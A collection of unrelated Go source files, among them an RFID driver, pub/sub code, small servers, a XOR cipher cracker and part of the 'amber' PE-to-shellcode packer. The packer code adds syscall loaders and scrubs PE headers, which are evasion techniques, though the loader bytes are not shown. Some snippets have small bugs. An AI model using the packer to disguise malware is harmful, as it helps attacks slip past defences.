return nil, err
}
var protos []*alphapb.FirebaserulesAlphaRuleset
for _, r := range resources.Items {
rp := RulesetToProto(r)
protos = append(protos, rp)
}
p := &alphapb.ListFirebaserulesAlphaRulesetResponse{}
p.SetItems(protos)
return p, nil
}
func createConfigRuleset(ctx context.Context, service_account_file string) (*alpha.Client, error) {
conf := dcl.NewConfig(dcl.WithUserAgent("dcl-test"), dcl.WithCredentialsFile(service_account_file))
return alpha.NewClient(conf), nil
}
|
package rc522
import (
"errors"
"github.com/zyxar/berry/bus"
"github.com/zyxar/berry/core"
)
var (
ErrNoTag = errors.New("no tag found")
ErrInvalidTag = errors.New("invalid tag")
ErrTagCRC = errors.New("tag crc error")
ErrTagCollision = errors.New("tag collision")
)
type Device struct {
dev bus.SPIBus
}
func Open() (*Device, error) {
dev, err := bus.OpenSPI(0, 5000, 0)
if err != nil {
return nil, err
}
d := &Device{dev}
if err = d.Reset(); err != nil {
return nil, err
}
if err = d.EnableAntenna(); err != nil {
return nil, err
}
return d, nil
}
func (id *Device) FindTag() (b []byte, err error) {
p, err := id.Request(PICC_REQIDL)
if err != nil {
return
}
b = p[:2]
return
}
func (id *Device) ReadTag(reg uint8) (b []byte, err error) {
p, err := id.ReadBytes(reg)
if err != nil {
return
}
b = p[:16]
return
}
func (id *Device) ReadByte(reg byte) (byte, error) {
p := []byte{((reg << 1) & 0x7E) | 0x80, 0}
_, err := id.dev.Read(p)
return p[1], err
}
func (id *Device) WriteByte(reg byte, data byte) error {
p := []byte{(reg << 1) & 0x7E, data}
_, err := id.dev.Write(p)
return err
}
func (id *Device) SetMask(reg, mask byte) error {
b, err := id.ReadByte(reg)
if err != nil {
return err
}
return id.WriteByte(reg, b|mask)
}
func (id *Device) ClearMask(reg, mask byte) error {
b, err := id.ReadByte(reg)
if err != nil {
return err
}
return id.WriteByte(reg, b & ^mask)
}
func (id *Device) Reset() (err error) {
if err = id.WriteByte(CommandReg, PCD_RESETPHASE); err != nil {
return
}
core.Delay(10)
if err = id.ClearMask(TxControlReg, 0x03); err != nil {
return
}
core.Delay(10)
if err = id.SetMask(TxControlReg, 0x03); err != nil {
return
}
if err = id.WriteByte(TModeReg, 0x8D); err != nil {
return
}
if err = id.WriteByte(TPrescalerReg, 0x3E); err != nil {
return
}
if err = id.WriteByte(TReloadRegL, 30); err != nil {
return
}
if err = id.WriteByte(TReloadRegH, 0); err != nil {
return
}
if err = id.WriteByte(TxASKReg, 0x40); err != nil {
return
}
if err = id.WriteByte(ModeReg, 0x3D); err != nil {
return
}
if err = id.WriteByte(RxThresholdReg, 0x84); err != nil {
return
}
if err = id.WriteByte(RFCfgReg, 0x68); err != nil {
return
}
if err = id.WriteByte(GsNReg, 0xff); err != nil {
return
}
err = id.WriteByte(CWGsCfgReg, 0x2f)
return
}
func (id *Device) Command(cmd uint8, data []byte) (r []byte, err error) {
var irq, wait uint8 = 0x00, 0x00
switch cmd {
case PCD_AUTHENT:
irq = 0x12
wait = 0x10
case PCD_TRANSCEIVE:
irq = 0x77
wait = 0x30
default:
}
if err = id.WriteByte(ComIEnReg, irq|0x80); err != nil {
return
}
if err = id.ClearMask(ComIrqReg, 0x80); err != nil {
return
}
if err = id.SetMask(FIFOLevelReg, 0x80); err != nil {
return
}
if err = id.WriteByte(CommandReg, PCD_IDLE); err != nil {
return
}
for i := 0; i < len(data); i++ {
if err = id.WriteByte(FIFODataReg, data[i]); err != nil {
return
}
}
if err = id.WriteByte(CommandReg, cmd); err != nil {
return
}
if cmd == PCD_TRANSCEIVE {
if err = id.SetMask(BitFramingReg, 0x80); err != nil {
return
}
}
n, err := id.ReadByte(ComIrqReg)
var i int
for i = 150; i != 0 && n&0x01 == 0 && n&wait == 0; i-- {
core.DelayMicroseconds(200)
if n, err = id.ReadByte(ComIrqReg); err != nil {
return
}
}
if err = id.ClearMask(BitFramingReg, 0x80); err != nil {
return
}
if i != 0 {
var pcdErr byte
if pcdErr, err = id.ReadByte(ErrorReg); err != nil {
return
}
if pcdErr&0x11 == 0 {
if n&irq&0x01 != 0 {
err = ErrNoTag
return
}
if cmd == PCD_TRANSCEIVE {
if n, err = id.ReadByte(FIFOLevelReg); err != nil {
return
}
var lastByte byte
if lastByte, err = id.ReadByte(ControlReg); err != nil {
return
}
lastByte &= 0x07
var length byte
if lastByte != 0 {
length = (n-1)*8 + lastByte
} else {
length = n * 8
}
if n == 0 {
n = 1
}
if n > maxLen {
n = maxLen
}
r = make([]byte, n+1)
for j := byte(0); j < n; j++ {
r[j], _ = id.ReadByte(FIFODataReg)
}
r[n] = length
return
}
} else if pcdErr&0x08 != 0 {
err = ErrTagCollision
return
}
}
err = ErrInvalidTag
return
}
func (id *Device) calculateCrc(p []byte) (b []byte, err error) {
if err = id.ClearMask(DivIrqReg, 0x04); err != nil {
return
}
if err = id.WriteByte(CommandReg, PCD_IDLE); err != nil {
return
}
if err = id.SetMask(FIFOLevelReg, 0x80); err != nil {
return
}
for i := 0; i < len(p); i++ {
if err = id.WriteByte(FIFODataReg, p[i]); err != nil {
return
}
}
if err = id.WriteByte(CommandReg, PCD_CALCCRC); err != nil {
return
}
var n byte
if n, err = id.ReadByte(DivIrqReg); err != nil {
return
}
for i := byte(0xFE); i != 0 && n&0x04 == 0; i-- {
if n, err = id.ReadByte(DivIrqReg); err != nil {
return
}
}
b = make([]byte, 2)
b[0], err = id.ReadByte(CRCResultRegL)
b[1], err = id.ReadByte(CRCResultRegM)
return
}
func (id *Device) EnableAntenna() (err error) {
var b byte
if b, err = id.ReadByte(TxControlReg); err != nil {
return
}
if b&0x03 == 0 {
err = id.SetMask(TxControlReg, 0x03)
}
return
}
func (id *Device) DisableAntenna() error {
return id.ClearMask(TxControlReg, 0x03)
}
func (id *Device) Halt() (err error) {
p := []byte{PICC_HALT, 0, 0, 0}
b, err := id.calculateCrc(p[:2])
if err != nil {
return
}
copy(p[2:], b)
_, err = id.Command(PCD_TRANSCEIVE, p)
return
}
func (id *Device) Request(req uint8) (b []byte, err error) {
if err = id.WriteByte(BitFramingReg, 0x07); err != nil {
return
}
var p = []byte{req, 0, 0}
if p, err = id.Command(PCD_TRANSCEIVE, p[:1]); err != nil {
return
}
if p[len(p)-1] != 0x10 {
err = ErrInvalidTag
return
}
b = p[:2]
return
}
// func (id *Device) Anticoll(cascade uint8, snr []byte) (err error) {
// }
func (id *Device) Select(cascade uint8, snr []byte) (err error) {
p := make([]byte, 12)
p[0] = cascade
p[1] = 0x70
copy(p[2:6], snr)
p[6] = snr[0] ^ snr[1] ^ snr[2] ^ snr[3]
var b []byte
if b, err = id.calculateCrc(p[:7]); err != nil {
return
}
copy(p[7:9], b)
if err = id.ClearMask(Status2Reg, 0x08); err != nil {
return
}
if b, err = id.Command(PCD_TRANSCEIVE, p[:9]); err != nil {
return
}
if b[len(b)-1] != 0x18 {
err = ErrInvalidTag
}
return
}
func (id *Device) AuthState(mode, reg uint8, key, snr []byte) (err error) {
p := make([]byte, 12)
p[0] = mode
p[1] = reg
copy(p[2:8], key)
copy(p[8:12], snr)
if _, err = id.Command(PCD_AUTHENT, p); err != nil {
return
}
if p[0], err = id.ReadByte(Status2Reg); err != nil {
return
}
if p[0]&0x08 == 0 {
err = ErrInvalidTag
}
return
}
func (id *Device) ReadBytes(reg uint8) (data []byte, err error) {
p := []byte{PICC_READ, reg, 0, 0}
b, err := id.calculateCrc(p[:2])
if err != nil {
return
}
copy(p[2:], b)
if b, err = id.Command(PCD_TRANSCEIVE, p); err != nil {
return
}
if b[len(b)-1] != 0x90 {
err = ErrInvalidTag
return
}
var crc []byte
if crc, err = id.calculateCrc(b[:16]); err != nil {
return
}
if crc[0] != b[16] || crc[1] != b[17] {
err = ErrTagCRC
return
}
data = b[:16]
return
}
func (id *Device) WriteBytes(reg uint8, data []byte) (err error) {
p := []byte{PICC_WRITE, reg, 0, 0}
b, err := id.calculateCrc(p[:2])
if err != nil {
return
}
copy(p[2:], b)
if b, err = id.Command(PCD_TRANSCEIVE, p); err != nil {
return
}
if b[0]&0x0F != 0x0A || b[len(b)-1] != 4 {
err = ErrInvalidTag
return
}
copy(b, data[:16])
if p, err = id.calculateCrc(b[:16]); err != nil {
return
}
copy(b[16:18], p)
if p, err = id.Command(PCD_TRANSCEIVE, b); err != nil {
return
}
if p[0]&0x0F != 0x0A || p[len(p)-1] != 4 {
err = ErrInvalidTag
}
return
}
|
package demo01
import "fmt"
func ArrayLiteral() {
arr1 := [3]int8{}
arr2 := [3]string{"A", "B", "C"}
arr3 := [...]bool{true, false, true}
arr4 := [...]int{0: 1, 2: 2, 1: 3, 5: 5, 7}
for i, v := range arr1 {
fmt.Printf("arr1[%d] = %d\n", i, v)
}
for i := 0; i < len(arr2); i++ {
fmt.Printf("arr2[%d] = %s\n", i, arr2[i])
}
var i = 0
for i < len(arr3) {
fmt.Printf("arr3[%d] = %t\n", i, arr3[i])
i++
}
for key, value := range arr4 {
fmt.Println(key, value)
}
}
func demo() {
type Man struct {
name string
age int
}
arr1 := [...]Man{{"梦航大神", 25}, {"包包", 25}}
for i, v := range arr1 {
fmt.Printf("%d\t%v", i, v)
}
}
|
package exchange
import (
"io"
"sync"
"github.com/daakia/utils/distribution"
)
type Node interface {
Subscribe(key []byte, id string, s io.Writer)
UnSubscribe(key []byte, id string)
Publish(key []byte, data []byte)
//Remove(key[]byte)
}
type TopicConf struct {
SingleWc byte
MultiWc byte
Sys byte
Dist func() distribution.Distribution
}
type TopicNode struct {
id byte
Conf *TopicConf
SubscriberKeys map[string]bool
WSubscriberKeys map[string]bool
subscribers distribution.Distribution
wsubscribers distribution.Distribution
children map[byte]*TopicNode
mu sync.Mutex
}
func (n *TopicNode) Publish(key []byte, data []byte) {
if n.wsubscribers != nil {
n.wsubscribers.Write(data)
}
// It is us!!! :D
if len(key) == 1 {
if n.subscribers == nil {
// lolmax why write?
// Maybe a bug? report later
return
}
n.subscribers.Write(data)
return
}
if n.children == nil {
n.children = make(map[byte]*TopicNode)
}
if v, ok := n.children[key[1]]; ok {
v.Publish(key[1:], data)
}
return
}
func (n *TopicNode) Subscribe(key []byte, id string, s io.Writer) {
//It is us!
if len(key) == 1 {
if n.subscribers == nil {
n.subscribers = n.Conf.Dist()
}
if n.SubscriberKeys == nil {
n.SubscriberKeys = make(map[string]bool)
}
//if !n.SubscriberKeys[id] {
n.subscribers.Attach(s)
n.SubscriberKeys[id] = true
//}
return
}
if key[1] == n.Conf.MultiWc {
if n.wsubscribers == nil {
n.wsubscribers = n.Conf.Dist()
}
if n.WSubscriberKeys == nil {
n.WSubscriberKeys = make(map[string]bool)
}
//if !n.WSubscriberKeys[id] {
n.wsubscribers.Attach(s)
n.WSubscriberKeys[id] = true
//}
}
if key[1] == n.Conf.SingleWc {
key = key[2:]
n.mu.Lock()
defer n.mu.Unlock()
for _, v := range n.children {
v.Subscribe(key, id, s)
}
return
}
n.mu.Lock()
if n.children == nil {
n.children = make(map[byte]*TopicNode)
}
if _, ok := n.children[key[1]]; !ok {
n.children[key[1]] = &TopicNode{id: key[1], Conf: n.Conf}
}
n.mu.Unlock()
n.children[key[1]].Subscribe(key[1:], id, s)
}
func (n *TopicNode) UnSubscribe(key []byte, id string) {
// Do noting for now.
}
|
package allmulti
import (
"context"
"crypto/tls"
)
func (ms *MultiAllStorage) IsPushCertStale(ctx context.Context, topic string, staleToken string) (bool, error) {
finalStale, finalErr := ms.stores[0].IsPushCertStale(ctx, topic, staleToken)
for n, storage := range ms.stores[1:] {
if _, err := storage.IsPushCertStale(ctx, topic, staleToken); err != nil {
ms.logger.Info("method", "IsPushCertStale", "storage", n+1, "err", err)
continue
}
}
return finalStale, finalErr
}
func (ms *MultiAllStorage) RetrievePushCert(ctx context.Context, topic string) (cert *tls.Certificate, staleToken string, err error) {
finalCert, finalToken, finalErr := ms.stores[0].RetrievePushCert(ctx, topic)
for n, storage := range ms.stores[1:] {
if _, _, err := storage.RetrievePushCert(ctx, topic); err != nil {
ms.logger.Info("method", "RetrievePushCert", "storage", n+1, "err", err)
continue
}
}
return finalCert, finalToken, finalErr
}
func (ms *MultiAllStorage) StorePushCert(ctx context.Context, pemCert, pemKey []byte) error {
finalErr := ms.stores[0].StorePushCert(ctx, pemCert, pemKey)
for n, storage := range ms.stores[1:] {
if err := storage.StorePushCert(ctx, pemCert, pemKey); err != nil {
ms.logger.Info("method", "StorePushCert", "storage", n+1, "err", err)
continue
}
}
return finalErr
}
|
package day02
import (
"flag"
"fmt"
"os"
)
/*
疑问:
1.为什么demo03中函数第二个参数和demo02中同名会报错: flag redefined
Note:
1.os.Args持有命令行参数
2.flag包实现命令行标记解析
1.命令行标记格式: -flag
*/
func CommandLineArgs() {
demo01()
//demo02()
demo03()
}
func demo01() {
//测试数据: name 杨一帆 age 21 gender male
fmt.Println("------方式一: os.Args------")
fmt.Println(os.Args)
for i, v := range os.Args {
fmt.Println(i, v)
}
}
func demo02() {
//测试数据: -name 杨一帆 -age 21 -gender male
fmt.Println("------方式二: flag包------")
namePtr := flag.String("name", "无名氏", "姓名")
agePtr := flag.Int("age", 0, "年龄")
genderPtr := flag.String("gender", "male", "性别")
flag.Parse() //从os.Args[1:]解析命令行参数
fmt.Printf("%p, %T, %s\n", namePtr, *namePtr, *namePtr)
fmt.Printf("%p, %T, %d\n", agePtr, *agePtr, *agePtr)
fmt.Printf("%p, %T, %s\n", genderPtr, *genderPtr, *genderPtr)
}
func demo03() {
//测试数据: -name 杨一帆 -age 21 -gender male
fmt.Println("------方式三: flag包------")
var name string
var age int
var gender string
flag.StringVar(&name, "name", "无名氏", "姓名")
flag.IntVar(&age, "age", 0, "年龄")
flag.StringVar(&gender, "gender", "male", "性别")
flag.Parse()
fmt.Printf("%p, %T, %s\n", &name, name, name)
fmt.Printf("%p, %T, %d\n", &age, age, age)
fmt.Printf("%p, %T, %s\n", &gender, gender, gender)
}
|
// Copyright 2014 The Sporting Exchange Limited. All rights reserved.
// Use of this source code is governed by a free license that can be
// found in the LICENSE file.
package collect
import (
"opentsp.org/contrib/collect-netscaler/nitro"
)
func init() {
registerStatFunc("protocolhttp", protocolHTTP)
}
func protocolHTTP(emit emitFn, r *nitro.ResponseStat) {
x := r.ProtocolHTTP
emit("protocol.http.request.bytes", *x.HTTPTotRxRequestBytes)
emit("protocol.http.request.errors type=HeaderTooLong", *x.HTTPErrIncompleteRequests)
emit("protocol.http.request.received type=GET", *x.HTTPTotGets)
emit("protocol.http.request.received type=Other", *x.HTTPTotOthers)
emit("protocol.http.request.received type=POST", *x.HTTPTotPosts)
emit("protocol.http.response.bytes", *x.HTTPTotTxResponseBytes)
emit("protocol.http.response.errors type=5yz", *x.HTTPErrServerBusy)
emit("protocol.http.response.errors type=HeaderTooLong", *x.HTTPErrIncompleteResponses)
emit("protocol.http.response.sent", *x.HTTPTotResponses)
emit("protocol.spdy.streams.total", x.SPDYTotStreams)
emit("protocol.spdy.streams.byversion v=2", x.SPDYv2TotStreams)
emit("protocol.spdy.streams.byversion v=3", x.SPDYv3TotStreams)
}
|
// Copyright (c) 2014 James Wendel. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package main
import (
"bitbucket.org/kyrra/sandbox/webapi/auth"
"flag"
"fmt"
)
func main() {
listen := flag.String("listen", ":8080", "Hostname and address to listen on")
source := flag.String("datasource", "domains.json", "Filename to load JSON user data from")
tokenFile := flag.String("tokensource", "", "Filename to save and load access_tokens from. Blank to bypass this feature.")
tokenTimeout := flag.Int("tokenTimeout", 3600, "Lifetime of auth tokens in seconds")
flag.Parse()
err := auth.Serve(*listen, *source, *tokenFile, *tokenTimeout)
if err != nil {
fmt.Println("error starting auth server: ", err)
}
}
|
package fileupload
import (
"context"
"errors"
"io/ioutil"
"net/http"
"github.com/alejogs4/blog/src/post/domain/post"
"github.com/alejogs4/blog/src/shared/infraestructure/httputils"
"github.com/alejogs4/blog/src/shared/infraestructure/middleware"
)
var errCopyingFile = errors.New("File: file must be present")
func uploadFile(request *http.Request, formField, folder string) (string, error) {
file, _, err := request.FormFile(formField)
if err != nil {
return "", post.ErrMissingPostPicture
}
defer file.Close()
newFile, err := ioutil.TempFile(folder, "upload-*.jpeg")
if err != nil {
return "", errCopyingFile
}
picturePath := "/" + newFile.Name()
fileBytes, err := ioutil.ReadAll(file)
if err != nil {
return "", errCopyingFile
}
_, err = newFile.Write(fileBytes)
if err != nil {
return "", errCopyingFile
}
return picturePath, nil
}
// UploadFile middleware that upload an incoming file in a given existing folder
func UploadFile(formField, folder string) middleware.Middleware {
return func(f http.HandlerFunc) http.HandlerFunc {
return func(response http.ResponseWriter, request *http.Request) {
response.Header().Set("Content-Type", "application/json")
filePath, err := uploadFile(request, formField, folder)
if err != nil {
httpError := mapFileErrorToHttpError(err)
httputils.DispatchNewHttpError(response, httpError.Message, httpError.Status)
return
}
// Look for what else I can use here
newContext := context.WithValue(request.Context(), "file", filePath) //nolint
f(response, request.WithContext(newContext))
}
}
}
|
package main
import (
"bufio"
"encoding/hex"
"fmt"
"os"
"strings"
)
func decodeBytes(src string) []byte {
h := make([]byte, hex.DecodedLen(len(src)))
_, err := hex.Decode(h, []byte(src))
if err != nil {
panic(err)
}
return h
}
func xorByVal(bs []byte, b byte) []byte {
res := make([]byte, len(bs))
for i, b1 := range bs {
res[i] = b1 ^ b
}
return res
}
// englishLetterFrequency returns the english letter frequency of a string
func englishLetterFrequency(input string) float32 {
// http://en.algoritmy.net/article/40379/Letter-frequency-English
var englishFreq = []float32{
0.08167, 0.01492, 0.02782, 0.04253, 0.12702, 0.02228, 0.02015, // A-G
0.06094, 0.06966, 0.00153, 0.00772, 0.04025, 0.02406, 0.06749, // H-N
0.07507, 0.01929, 0.00095, 0.05987, 0.06327, 0.09056, 0.02758, // O-U
0.00978, 0.02360, 0.00150, 0.01974, 0.00074, // V-Z
}
var observed [26]int
var ignored, invalid int
for _, ch := range input {
if ch >= 65 && ch <= 90 {
observed[ch-65]++ // uppercase A-Z
} else if ch >= 97 && ch <= 122 {
observed[ch-97]++ // lowercase a-z
} else if strings.ContainsRune("\"'`´ .,:;", ch) {
ignored++
} else {
invalid++
}
}
res := float32(1) - float32(invalid)/float32(len(input))
charCount := float32(len(input) - ignored)
for i := 0; i < 26; i++ {
res += float32(observed[i])/charCount - englishFreq[i]
}
return res
}
func GuessXoredValue(input []byte) (rune, float32, string) {
var bestFrequ float32
var bestRune rune
for r := rune(1); r < 128; r++ {
test := string(xorByVal(input, byte(r)))
if frequ := englishLetterFrequency(test); frequ > bestFrequ {
bestFrequ = frequ
bestRune = r
}
}
return bestRune, bestFrequ, string(xorByVal(input, byte(bestRune)))
}
func main() {
f, err := os.Open("sentences.txt")
if err != nil {
panic(err)
}
defer f.Close()
sc := bufio.NewScanner(f)
var lineNo = 1
var maxFrequ float32
var vs []interface{}
for sc.Scan() {
ch, frequ, s := GuessXoredValue(decodeBytes(sc.Text()))
/*if frequ > 0.8 {
fmt.Println("Candidate", lineNo, "XOR char", string(ch), "hit rate", frequ, "decoded:", s)
}*/
if frequ > maxFrequ {
vs = []interface{}{"Guessing line", lineNo, "XOR char", string(ch), "hit rate", frequ, "decoded:", s}
maxFrequ = frequ
}
lineNo++
}
if sc.Err() != nil {
panic(sc.Err())
}
fmt.Println(vs...)
}
|
package main
import (
"fmt"
"net/http"
"log"
"encoding/json"
"strconv"
)
// 问题类型
type Question struct {
Description string `json:"description"`
ChoiceList []string `json:"choice_list"`
}
// 问题提供的接口类型
type QuestionProvider struct {
QuestionList []Question `json:"question_list"`
}
func (qp *QuestionProvider) InitFromFile (path string) {
question_list := `{"question_list":[{"description":"abcde?","choice_list":["A. g","B. f","C. k","D. z"]},
{"description":"1 + 1 = ?","choice_list":["A. 2","B. 3","C. 4","D. 5"]},
{"description":"1 + 2 = ?","choice_list":["A. -99","B. jkl","C. e","D. 3"]}
]}`
_ = json.Unmarshal([]byte(question_list), &qp)
return
}
// 实现http.Handler的接口
func (qp QuestionProvider) ServeHTTP (w http.ResponseWriter, r *http.Request){
r.ParseForm() // 解析参数
var question_id = r.Form["question_id"]
if question_id != nil {
// fmt.Fprintf(w, "Received question_id is %s\n", question_id)
qid, err := strconv.Atoi(question_id[0])
// fmt.Fprintf(w, "Total questions number: %d\n", len(qp.QuestionList))
if err == nil && qid < len(qp.QuestionList) {
fmt.Fprintf(w, "Question description: %s\n", qp.QuestionList[qid].Description)
for _, choice := range(qp.QuestionList[qid].ChoiceList) {
fmt.Fprintf(w, "%s\n", choice)
}
} else {
fmt.Fprintf(w, "Wrong question_id")
}
} else {
fmt.Fprintf(w, "Error on question_id")
}
}
func main() {
qp := &QuestionProvider{}
qp.InitFromFile("path-to-read")
err := http.ListenAndServe(":23333", qp)
if err != nil {
log.Fatal("ListenAndServe: ", err)
}
}
|
package client
import (
"strings"
"net/http"
"io/ioutil"
)
func post(url string, data map[string]string) (map[string]interface{}, error) {
payload := strings.NewReader(makeFormData(data, "boundaryhere"))
req, _ := http.NewRequest("POST", url, payload)
req.Header.Add("content-type", "multipart/form-data; boundary=boundaryhere")
res, _ := http.DefaultClient.Do(req)
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return map[string]interface{}{}, err
}
var bodyJson map[string]interface{}
json.Unmarshal(body, &bodyJson)
return bodyJson, nil
}
func makeFormData(data map[string]string, boundary string) string {
var formStr = ""
for k,v := range data {
formStr += "--" + boundary + "\r\n" +`Content-Disposition: form-data; name="` + k + `"` + "\r\n\r\n" + v + "\r\n"
}
formStr += "--" + boundary + "--"
return formStr
} |
package internal
import (
"fmt"
"io"
"os"
"time"
)
func Log(format string, args ...interface{}) {
if args != nil {
fLog(os.Stdout, format, args)
} else {
fLog(os.Stdout, format)
}
}
func LogErr(format string, args ...interface{}) {
if args != nil {
fLog(os.Stderr, "ERROR: "+format, args)
} else {
fLog(os.Stderr, "ERROR: "+format)
}
}
func fLog(out io.Writer, format string, args ...interface{}) {
now := time.Now()
fmt.Fprintf(out, now.Format(time.RFC3339)+": "+format+"\n", args...)
}
|
package main
import (
rl "rules"
ac "actions"
)
type Monitor struct {
d_rules []rl.Rule
d_actions []ac.Action
}
func (m*Monitor)Init(){
m.d_actions = ac.InitAllActions()
m.d_rules = rl.InitAllRules()
}
func (m*Monitor)MparseLine(line string)string{
event,rb := ParseLine(line)
if rb == false {
return "Parse line failed"
}
for _, rule := range m.d_rules {
ts := rule.CheckEvent(&event)
if len(ts) == 0 {
continue
}
for _,act := range m.d_actions {
act.TakeAction(ts)
}
}
return ""
}
|
package amber
import (
"bytes"
"encoding/binary"
"errors"
"path/filepath"
"github.com/EgeBalci/amber/utils"
pe "github.com/EgeBalci/debug/pe"
)
const (
PE_DOS_STUB = "This program cannot be run in DOS mode"
)
var (
ErrUnsupportedArch = errors.New("unsupported PE file architecture")
ErrInvalidPeSpecs = errors.New("unsupported PE file specs")
ErrInvalidPeHeaders = errors.New("invalid PE headers")
)
// Blueprint structure contains PE specs, tool parameters and
// OS spesific info
type PE struct {
Name string
FullName string
FileSize int
IAT bool
Resource bool
IgnoreIntegrity bool
IatResolver bool
SyscallLoader bool
ScrapeHeaders bool
// PE specs...
Architecture int
SizeOfImage uint32
ImageBase uint64
AddressOfEntry uint32
Subsystem uint16
ImportTable uint64
ExportTable uint64
RelocTable uint64
ImportAdressTable uint64
HasBoundedImports bool
HasDelayedImports bool
HasTLSCallbacks bool
HasRelocData bool
IsCLR bool
IsDLL bool
// PE File
file *pe.File
}
func Open(fileName string) (bp *PE, err error) {
bp = new(PE)
bp.Name = fileName
bp.FullName, err = filepath.Abs(fileName)
if err != nil {
return
}
bp.file, err = pe.Open(bp.FullName)
if err != nil {
return
}
switch bp.file.FileHeader.Machine {
case pe.IMAGE_FILE_MACHINE_I386:
bp.Architecture = 32
case pe.IMAGE_FILE_MACHINE_AMD64:
bp.Architecture = 64
default:
return nil, ErrUnsupportedArch
}
// Fetch OptionalHeader values to blueprint
switch hdr := (bp.file.OptionalHeader).(type) {
case *pe.OptionalHeader32:
// cast those back to a uint32 before use in 32bit
bp.ImageBase = uint64(hdr.ImageBase)
bp.Subsystem = hdr.Subsystem
bp.SizeOfImage = hdr.SizeOfImage
bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
case *pe.OptionalHeader64:
bp.ImageBase = hdr.ImageBase
bp.Subsystem = hdr.Subsystem
bp.SizeOfImage = hdr.SizeOfImage
bp.IsDLL = bp.file.Characteristics == (bp.file.Characteristics | pe.IMAGE_FILE_DLL)
bp.HasRelocData = hdr.DataDirectory[5].Size != 0x00
bp.HasBoundedImports = hdr.DataDirectory[11].Size != 0x00
bp.HasDelayedImports = hdr.DataDirectory[13].Size != 0x00
bp.IsCLR = hdr.DataDirectory[14].Size != 0x00
bp.ExportTable = uint64(hdr.DataDirectory[0].VirtualAddress + uint32(hdr.ImageBase))
bp.ImportTable = uint64(hdr.DataDirectory[1].VirtualAddress + uint32(hdr.ImageBase))
bp.RelocTable = uint64(hdr.DataDirectory[5].VirtualAddress + uint32(hdr.ImageBase))
bp.ImportAdressTable = uint64(hdr.DataDirectory[12].VirtualAddress + uint32(hdr.ImageBase))
}
bp.FileSize, err = utils.GetFileSize(bp.FullName)
return
}
// AssemblePayload generates the binary stub bla bla...
func (pe *PE) AssembleLoader() ([]byte, error) {
var (
rawFile = pe.file.RawBytes
err error
)
if pe.ScrapeHeaders {
rawFile, err = pe.ScrapePeHeaders()
if err != nil {
return nil, err
}
}
// Add a call over the given binary
payload, err := pe.AddCallOver(rawFile)
if err != nil {
return nil, err
}
// Decide on the architecture, API block, and loader types...
// we have 3 pre-assembled loaders for public version of amber.
switch pe.Architecture {
case 32:
if pe.SyscallLoader {
return nil, errors.New("syscall loader only supports 64 bit PE files")
}
payload = append(payload, LOADER_32...)
case 64:
if pe.SyscallLoader {
payload = append(payload, SYSCALL_LOADER_64...)
} else {
payload = append(payload, LOADER_64...)
}
default:
return nil, ErrUnsupportedArch
}
if pe.IatResolver {
if pe.SyscallLoader {
return nil, errors.New("cannot use IAT resolver with syscall loader")
}
switch pe.Architecture {
case 32:
payload = bytes.ReplaceAll(payload, CRC_API_32, IAT_API_32)
case 64:
payload = bytes.ReplaceAll(payload, CRC_API_64, IAT_API_64)
}
}
return payload, nil
}
// AddCallOver function adds a call instruction at the beginning of the given payload
// address of the payload will be pushed to the stack and execution will continue after the end of payload
func (pe *PE) AddCallOver(payload []byte) ([]byte, error) {
// // Perform a short call over the payload
size := uint32(len(payload))
buf := new(bytes.Buffer)
err := binary.Write(buf, binary.LittleEndian, size)
if err != nil {
return nil, err
}
return append(append([]byte{0xe8}, buf.Bytes()...), payload...), nil
}
func (pe *PE) ScrapePeHeaders() ([]byte, error) {
rawFile, err := pe.file.Bytes()
if err != nil {
return nil, err
}
// Scrape MZ magic bytes...
if rawFile[0] == 'M' &&
rawFile[1] == 'Z' {
rawFile[0] = 0x00
rawFile[1] = 0x00
} else {
return nil, ErrInvalidPeHeaders
}
// Scrape the DOS stub message...
if bytes.Contains(rawFile, []byte(PE_DOS_STUB)) {
return nil, ErrInvalidPeHeaders
}
return bytes.Replace(rawFile, []byte(PE_DOS_STUB), make([]byte, len(PE_DOS_STUB)), 1), nil
}
|
package main
import (
"encoding/json"
"github.com/stretchr/testify/assert"
"testing"
)
func TestModelsCanBeConvertedToProperJson(t *testing.T) {
expected := "{\"drink\":\"beer\",\"rolled\":2}"
redisResult := &Score{
Drink: "beer",
Rolled: 2,
}
body, err := json.Marshal(redisResult)
result := string(body)
assert.Nil(t, err)
assert.Equal(t, result, expected)
}
func TestErrorModel(t *testing.T) {
expected := "{\"errorMessage\":\"Could not find combination of user: joeri list: joeri\",\"uniqueCode\":\"someuuid\"}"
notFoundError := &ErrorModel{
Message: "Could not find combination of user: joeri list: joeri",
UniqueCode: "someuuid"}
body, err := json.Marshal(notFoundError)
result := string(body)
assert.Nil(t, err)
assert.Equal(t, result, expected)
}
|
package goracle
// Version of this driver
const Version = "v2.1.20"
|
package backend_service
import (
"2021/yunsongcailu/yunsong_server/backend/backend_dao"
"2021/yunsongcailu/yunsong_server/backend/backend_model"
)
type BackendCategoryServer interface {
// 获取所有类别
GetCategories() (categories []backend_model.BackendCategoryModel,err error)
// 添加类别
AddCategory(category backend_model.BackendCategoryModel) (err error)
// 修改类别
EditCategory(category backend_model.BackendCategoryModel) (err error)
// 删除类别
RemoveCategory(categoryId int64) (err error)
// 根据类别ID 查询分类
GetCategoriesByMenuId(menuId int64) (categories []backend_model.BackendCategoryModel,err error)
}
type backendCategoryServer struct {}
func NewBackendCategoryServer() BackendCategoryServer {
return &backendCategoryServer{}
}
var bcd = backend_dao.NewBackendCategoryDao()
// 获取所有类别
func(bcs *backendCategoryServer) GetCategories() (categories []backend_model.BackendCategoryModel,err error) {
return bcd.FindCategories()
}
// 添加类别
func(bcs *backendCategoryServer) AddCategory(category backend_model.BackendCategoryModel) (err error) {
return bcd.InsertCategory(category)
}
// 修改类别
